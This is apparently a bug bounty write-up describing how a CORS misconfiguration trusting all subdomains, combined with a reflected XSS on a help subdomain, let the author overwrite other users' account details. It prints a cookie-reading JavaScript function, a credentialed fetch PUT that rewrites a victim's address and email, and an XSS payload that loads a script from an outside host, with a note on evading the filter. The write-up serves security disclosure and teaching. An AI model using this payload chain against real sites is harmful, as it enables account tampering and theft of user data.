CORS To CSRF Attack
This writeup is about the CORS Misconfiguration by which I was able to perform a CSRF attack to change other users account Info. The target let’s just say it was named redact.com was sending a PUT request to the server for updating User Information like Address, Name, etc.
An Origin Header was also sent in the request Origin: redact.com which was reflected in the Response and the Access-Control-Allow-Credentials was set to True. Which means that cookies can be sent along with the request. I tried to change the Origin Header value to evil.com and then redact.com.evil.com but both were rejected. But sending the
Origin: evil.redact.com worked which means that sub domain of redact.com can send requests to its API.
Now I needed an XSS on one of its subdomains to send the PUT request to the Server, luckily I got an XSS on help.redact.com. But it wasn’t enough an enctyptedMembershipNumer param was sent along with the PUT request to identify the user. After looking into the Cookies of redact.com I found that the enctyptedMembershipNumer was saved in a cookie with a name prop_29 which was scoped to the .redact.com the dot, in the beginning, means that this cookie can be accessed from its subdomains. So to extract that Cookie I wrote a JS code.
function getCookie(name) {
var match = document.cookie.match(new RegExp(‘(^| )’ + name + ‘=([^;]+)’));
if (match) return match[2];
}
Now the complete code to get the enctyptedMembershipNumer and to send the PUT
request.
function getCookie(name) {
var match = document.cookie.match(new RegExp(‘(^| )’ + name + ‘=([^;]+)’));
if (match) return match[2];
}cook = getCookie(“prop_29”)
data = {“member”:{“mailingAddress”:{“addressLineOne”:”Account Hacked”,”city”:”NEW Port”,”stateOrProvinceCode”:”NY”,”postalCode”:”20001",”email”:”hacked@gmail.com”,”countryCode”:”US”}}}
fetch(`https://www.redact.com/api/node/vivaldi/v1/account/primary-contact?encryptedMembershipNumber=${cook}`, {method: “PUT”, credentails: “include”, body: JSON.stringify(data)})
I created a JS file and uploaded the code on my server to use in the XSS payload.
Final Payload:
https://help.redact.com/app/answers/list?searchTerm=<svg onload=script=document[‘createElement’](‘script’);script[‘src’]=’https://osamaavvan.000webhostapp.com/a.js’;document[‘head’][‘appendChild’](script);>
The . and // were removed from the Payload by the XSS filter so I converted them to their respective HTML entities.
Thank You for Reading.
📝 Read this story later in Journal.
👩💻 Wake up every Sunday morning to the week’s most noteworthy stories in Tech waiting in your inbox. Read the Noteworthy in Tech newsletter.